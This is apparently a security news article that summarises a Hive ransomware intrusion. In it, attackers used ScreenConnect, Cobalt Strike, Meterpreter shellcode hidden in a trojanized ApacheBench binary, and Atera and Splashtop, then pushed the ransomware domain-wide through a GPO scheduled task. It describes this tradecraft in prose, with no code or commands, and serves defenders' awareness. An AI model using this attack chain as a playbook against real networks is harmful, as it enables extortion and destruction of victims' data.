Tuesday, May 6, 2025
HomeCyber Security NewsThreat Actors Actively Using Remote Management Tools to Deploy Ransomware

Threat Actors Actively Using Remote Management Tools to Deploy Ransomware

Published on

SIEM as a Service

Follow Us on Google News

The threat actors have been spotted increasingly depending on Remote Management and Monitoring (RMM) tools, which resulted in a relatively botched Hive ransomware distribution. 

The original payload consisted of an executable file disguised as a legitimate document. 

According to Huntress, this campaign was most likely distributed by email, with a link that, when clicked, downloaded the executable.

- Advertisement - Google News

The DFIR reports that the initial access method needed the end user to be a local Administrator, as less privileged users would cause the installation to fail.

Document
FREE Demo

Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

How the Attack is Carried Out?

The threat actor launched discovery commands through ScreenConnect around an hour after execution, utilizing basic Windows tools such as system info, ipconfig, and net. 

After a few minutes, the threat actor executed a BITS transfer task to deploy a Cobalt Strike beacon.

The threat actor utilized ScreenConnect to download additional binary after being idle for an hour. This new file contained a trojanized ApacheBench executable with Metasploit shellcode hidden inside it. 

The shellcode would start a Meterpreter command and control channel when it was run. The threat actor launched a new command and control channel and then transitioned to lateral movement by launching PowerShell and MSI installers for Atera and Splashtop on a server via remote services. 

The Execution Process

More BITS transfers were seen to create more Cobalt Strike footholds. Reports say the threat actor executed a batch file that used PowerShell’s built-in tools to retrieve Active Directory data.  The threat actor examined file shares and backups on the network using these RDP connections.

The threat actor launched the Hive ransomware as the first step in their ultimate operation. They altered the administrator’s password before manually running the ransomware on many important servers. 

To perform domain-wide encryption, the threat actor placed the ransomware binary on a network share. Then he built a new domain-wide GPO with a scheduled job to execute the ransomware binary on each domain-joined machine.

Deploy a Group Policy Object

Also, the threat actor then tried to encrypt the whole domain after these manual ransomware operations.

Researchers say the time to ransomware (TTR) from initial access was 61 hours. The threat actor erased beneficial artifacts during their attack to hide their presence. According to the research, attackers used remote services for lateral movement.

Managed endpoint solutions enable organizations to scan for threats manage, resolve, and prevent data breaches. Try for Free Today!

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Gunra Ransomware’s Double‑Extortion Playbook and Global Impact

Gunra Ransomware, has surfaced as a formidable threat in April 2025, targeting Windows systems...

Hackers Exploit 21 Apps to Take Full Control of E-Commerce Servers

Cybersecurity firm Sansec has uncovered a sophisticated supply chain attack that has compromised 21...

Hackers Target HR Departments With Fake Resumes to Spread More_eggs Malware

The financially motivated threat group Venom Spider, also tracked as TA4557, has shifted its...

RomCom RAT Targets UK Organizations Through Compromised Customer Feedback Portals

The Russian-based threat group RomCom, also known as Storm-0978, Tropical Scorpius, and Void Rabisu,...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Gunra Ransomware’s Double‑Extortion Playbook and Global Impact

Gunra Ransomware, has surfaced as a formidable threat in April 2025, targeting Windows systems...

Hackers Exploit 21 Apps to Take Full Control of E-Commerce Servers

Cybersecurity firm Sansec has uncovered a sophisticated supply chain attack that has compromised 21...

Hackers Target HR Departments With Fake Resumes to Spread More_eggs Malware

The financially motivated threat group Venom Spider, also tracked as TA4557, has shifted its...